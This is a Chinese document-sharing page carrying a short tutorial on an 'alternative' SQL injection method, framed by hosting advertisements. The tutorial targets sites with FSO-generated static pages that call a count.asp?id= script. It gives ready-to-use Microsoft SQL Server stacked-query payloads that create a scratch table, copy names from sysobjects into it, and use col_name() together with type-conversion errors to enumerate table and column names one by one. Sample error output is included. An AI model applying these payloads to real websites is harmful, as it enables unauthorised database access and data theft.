欢迎来到天天文库
浏览记录
ID:6140811
大小:31.50 KB
页数:2页
时间:2018-01-04
《sql注入的另类方法介绍》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、SQL注入的另类方法介绍 Sql一种对关系数据库中的数据进行定义和操作的句法,为大多数关系数据库管理系统所支持的工业标准。那么对于sql注入的方法站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps主机、服务器租用的中国信息港来为你详细介绍! 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。大家在是否碰到过这样的站点: 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来
2、可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。 我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。 攻击方法: 查看源文件/看里面是否有通过JS来调用的页面。 如调用来更新文章的浏览次数。 我们就可以这样来试一下可否注入: http://服务器域名/count.asp?id=1552' 看一下是否出错。如出错说明有注入漏洞。然后正常攻击。 在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用,这是一个
3、好习惯) post.htm内容:主要是方便输入。 对于SQLSERVER的服务器可以这样判断:在1552后加一分号,如正常有可能是SQLSERVER 对于这类数据库可以先建一个表id=1552;createtableaaa(aaachar(20));-- 然后插入一条记录:id=1552;insertintoaaavalues('test');-- 再之后枚举出他的数据表名: id=1552;updateaaasetaaa=(selecttop1namefromsysobjectswherexty
4、pe='u'andstatus>0);-- 这是将第一个表名更新到aaa的字段处。 id=1552andexists(select*fromaaawhereaaa>5)就会报错,多数情况会将表名直接读出:看: MicrosoftOLEDBProviderforSQLServer错误'80040e07' 将varchar值'vote'转换为数据类型为int的列时发生语法错误。 /search.asp,行21 其中vote就是表名: 也可以先猜出一个表名,再把(selecttop1namefroms
5、ysobjectswherextype='u'andstatus>0)的值更新到那个表的一条记录中去。通过网页显示。 读出第一个表,第二个表可以这样读出来(在条件后加上andname<>'刚才得到的表名')。 id=1552;updateaaasetaaa=(selecttop1namefromsysobjectswherextype='u'andstatus>0andname<>'vote');-- 然后id=1552andexists(select*fromaaawhereaaa>5) 读出第二个
6、表,^^^^^^一个个的读出,直到没有为止。 读字段是这样: id=1552;updateaaasetaaa=(selecttop1col_name(object_id('表名'),1));-- 然后id=1552andexists(select*fromaaawhereaaa>5)出错,得到字段名 id=1552;updateaaasetaaa=(selecttop1col_name(object_id('表名'),2));-- 然后id=1552andexists(select*fromaaaw
7、hereaaa>5)出错,得到字段名……类推中国信息港--服务器租用-国内8强虚拟主机服务商.十年品牌虚拟主机和域名注册精品服务,为全球10万用户提供专业虚拟主机,域名注册,VPS主机租用,香港虚拟主机,企业邮箱服务.提供虚拟主机转入。
此文档下载收益归作者所有